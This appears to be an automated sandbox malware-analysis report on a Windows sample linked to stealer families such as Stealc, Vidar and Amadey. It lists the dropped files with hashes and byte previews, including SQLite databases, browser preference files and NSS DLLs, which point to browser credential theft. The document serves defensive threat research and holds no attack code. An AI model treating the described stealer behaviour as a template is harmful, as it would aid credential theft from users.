	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	g8Z5OO8o6p.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	xQ9Dzc7cj9.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\DHDAKFCG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2651167055138455
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMuSAELyKOMq+8yC8F/YfU5m+OlTLVumw:Bq+n0Ju9ELyKOMq+8y9/Owb
MD5:	BC425300C5347721BF0B0C1B9639E667
SHA1:	73E2EF9023F96A762A44E039E6248C5BD37EF868
SHA-256:	AED81035B4C4608196CCC61850ECB38EB86F85B0B2500C7CE8A286D761B8E48D
SHA-512:	B68E7800C64B048BC106BCE004E29D2EC54A838455E4A7D15604064899AEDDE48392A9A8CC2E38C4107C9102554077AB9281CB6CDFAD81E651ACCF49C1B0BFF9
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBFIJJEB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJKKKFCFHCFIECBGDHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IIJEBAECGCBKECAAAEBFBGHJJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJDGIECFCAKKFHIIIJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KFIJEGCBGIDGHIDHDGCBFCGDGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJJDHJEGHJKECBGCF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: g8Z5OO8o6p.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: xQ9Dzc7cj9.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: g8Z5OO8o6p.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: xQ9Dzc7cj9.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9fc857756c.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1e82a004-8fb4-498d-9095-4be695b1f616.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44604
Entropy (8bit):	6.096226339062828
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBAwu7hDO6vP6OimrlQFhAFfuFD68cGoup1Xl3jVz6:z/Ps+wsI7ynE/6CYD8chu3VlXr4CRo1
MD5:	6CA8513EF456610E32F86D7C76A0B7BD
SHA1:	877A933D6D4706285DCDDA386170F43F50874818
SHA-256:	45DF3FFEE4993AA5D9833F30CC115EE26811C469BAADCCA2F67CF2FD8003D797
SHA-512:	8701B73F07C0FE2F36E390458CB020F646169B3A1E216C24F189BB9D5B72BCC813E969383CCAEE6CAFE67ECFF459F7A286ECFC22A04C21C252C9E1EEACEDF74C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\24b0db7b-e1fa-4c78-8957-ee45985aa74f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45947
Entropy (8bit):	6.08716833816738
Encrypted:	false
SSDEEP:	768:+MkbJrT8IeQcrQgFoswnSu4hDO6vP6OimrhgX6PdIPRqXcpYL+CAo5Goup1Xl3jm:+Mk1rT8HloswD6CY/cp1Ro5hu3VlXr4/
MD5:	1775BD49DCF6E4BF7333626F6B572336
SHA1:	15C9E08D852EF6FAE975D35FFAE91C1863663134
SHA-256:	919FB6F179A7539FDC6136BC1A2075ED033B2D2BE13F44FDB680D53E8720154F
SHA-512:	F07698990D1816864F4FF34AE4C12E127971FA96898D88A108A0E124DDC16EDA5117914A200971066F8FD9081BFB85DBCBEF64BCC3A13966458989DC3C283CAE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731210918"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\357675c5-13ca-4f34-9a55-da02af6ecbf0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45870
Entropy (8bit):	6.08721467848742
Encrypted:	false
SSDEEP:	768:+MkbJrT8IeQcrQgx9swnSu4hDO6vP6OimrNgX6PdIPRqXcpYL+CAo5Goup1Xl3jm:+Mk1rT8HR9swD6CY7cp1Ro5hu3VlXr4/
MD5:	CD9D4D888AB3D258093A5B3E79267474
SHA1:	E20720A9805E96F4A3FEEB1093D2A9F18B5D61D6
SHA-256:	FF468A9B1EF5F02DA62AC5C063E6942F2F0EA1D77BC1671935F28ABF516C0826
SHA-512:	152DE1D7C78D76D8A9A18E28D3336BB68D783C31793BA99DB7DB06DC323E4A93B10FEEC6671FA905BEDFB4B8F563FE7B52C176ADF673AFF3863A95BC31B3594D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731210918"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4a7a9a58-d4d6-40d7-b662-0a834256035d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44686
Entropy (8bit):	6.095636677505969
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xkBkwu7hDO6vP6OimrNgX6PdIPRqXcGoup1Xl3jVzXq:z/Ps+wsI7yOEr6CY7chu3VlXr4CRo1
MD5:	AD0C7DF7C1BFD4DA0B6BEEC33D020410
SHA1:	141C26F532E719D49432773ECEA2E2FB6D0F9987
SHA-256:	D1B01E74FC179418DCF3EA306E15E418FE04F9E1FCE8A0843C983725F5732EE9
SHA-512:	61E4F1C44BF2D1B217D370A97E120909BF44724543D2C8D4BA4CDAA35E18CCC561CC6D098A6784C02929E406436E75586ADDD09AF6D8BE46A1B7B53E389F924E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4f13fd81-d9a2-46c2-aa31-be5e31f85457.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45823
Entropy (8bit):	6.087409105901783
Encrypted:	false
SSDEEP:	768:+MkbJrT8IeQcrQgx9scSu4hDO6vP6OimrNgX6PdIPRqXcpYL+CAo5Goup1Xl3jVY:+Mk1rT8HR9sU6CY7cp1Ro5hu3VlXr4/
MD5:	B276E685332EA2D8DEFCF8F7F8455236
SHA1:	DFC392C742A46EDED8B1BF13082FE661129E2F13
SHA-256:	EA4234347B84980B681391483F4A28B21050805876CD176969B50F6C65FC0BEC
